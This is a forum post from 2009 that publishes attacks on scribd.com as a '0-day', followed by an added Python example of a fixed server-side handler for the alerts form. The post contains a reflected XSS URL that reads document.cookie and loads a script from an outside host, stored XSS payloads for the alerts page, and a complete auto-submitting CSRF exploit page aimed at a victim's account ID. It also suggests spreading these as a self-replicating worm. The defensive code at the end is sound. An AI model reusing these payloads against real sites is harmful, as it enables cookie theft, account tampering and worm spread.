MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com
Posted by: XaDoS
Date: September 18, 2009 03:57PM

The site http://www.srcibd.com, a network community (which Obama used for his election campaign), is a big community that fights with amazon.com for the 1st most visited site in the world. (Scribd now has 55 million visits every month.)

It's vulnerable to XSS, permanent XSS, JS injection and CSRF
(all DISCOVERED BY ME)

### XSS:
http://www.scribd.com/my_docs?query=//%3Cfont%20color=%22red%22%3EXADOS%20WAS%20HERE%3C/font%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20By%20XaDoS%3Ch1%3E%3C/marquee%3E%3Cscript%20src=%22http://www.googlebig.com/x.js%22%3E%3C/script%3E

### Permanent XSS:

(after login)
At the page http://www.scribd.com/alerts a user can write a new alert, but with malicious JS code like:
Name of alert: "><script>alert(1)</script>
Text of alert: "><script>alert(2)</script>

and so the POST request looks like..
Code:
<input id="alert_name" name="alert[name]" size="30" style="width: 500px;" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" type="text">

<textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">"&gt;&lt;script&gt;alert(2)&lt;/script&gt;</textarea>


and there is no token or captcha, so an attacker can write CSRF code like this (working!):
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>scribd csrf exploit</title>
<meta http-equiv="Content-Type" content="text/HTML; charset=UTF-8" />
</head>
<body>
<form name="xados" action="http://www.scribd.com/alerts" class="new_alert" id="new_alert" method="post">
    <input id="alert_word_user_id" name="alert[word_user_id]" type="hidden" value="[ID-VICTIM]" />
        <input id="alert_name" name="alert[name]" size="30" style="width: 500px;" type="text" value="[TITLE]" />
    <textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">[MESSAGE]</textarea>
        <input checked="checked" id="alert_matchmode_2" name="alert[matchmode]" type="radio" value="2" />
    <input id="alert_matchmode_1" name="alert[matchmode]" type="radio" value="1" />
    <input name="commit" type="submit" value="submit" />
</form>
<script>document.xados.submit()</script>
</body>
</html>

and through this CSRF one can create an XSS worm that self-replicates
through the alerts' permanent XSS vuln.

have fun.
0-day by XaDoS
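As an added example (not from the post, and not Scribd's own code), here is how a server-side handler for this alerts form could close both holes at once: refuse any POST whose per-session CSRF token is missing or wrong, take the alert owner from the session instead of the `alert[word_user_id]` field, and HTML-escape `alert[name]` and `alert[alert_text]` before rendering them. The `authenticity_token` field name, the HMAC token scheme and the session ids are assumptions for the example.

```python
import hashlib
import hmac
from html import escape

# Constructed secret for the example; a real deployment keeps this out of source.
SERVER_SECRET = b"constructed-server-secret"


def csrf_token_for(session_id: str) -> str:
    """Derive a per-session CSRF token (HMAC of the session id, assumed scheme)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_alert(name: str, text: str) -> str:
    """Render the alert form the way the vulnerable page should have:
    every user-supplied value is HTML-escaped, so "><script>..." stays text."""
    return (
        f'<input id="alert_name" name="alert[name]" type="text" '
        f'value="{escape(name, quote=True)}">\n'
        f'<textarea id="alert_alert_text" name="alert[alert_text]">'
        f"{escape(text)}</textarea>"
    )


def handle_alert_post(form: dict, session_id: str) -> tuple:
    """Validate a POST to /alerts and return (status, body).

    403: the token is missing or does not match this session. A cross-site
    auto-submitting form (like the one in the post) cannot read the victim's
    token, so it is refused here before anything is stored.
    """
    submitted = form.get("authenticity_token", "")
    if not hmac.compare_digest(submitted, csrf_token_for(session_id)):
        return 403, "CSRF token missing or invalid"
    if form.get("alert[matchmode]") not in ("1", "2"):
        return 400, "bad matchmode"
    # The owner is the logged-in session, never alert[word_user_id] from the
    # form, so a forged request cannot plant an alert on another user's account.
    owner = session_id
    body = render_alert(form.get("alert[name]", ""), form.get("alert[alert_text]", ""))
    return 200, f"<!-- owner: {escape(owner)} -->\n{body}"
```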
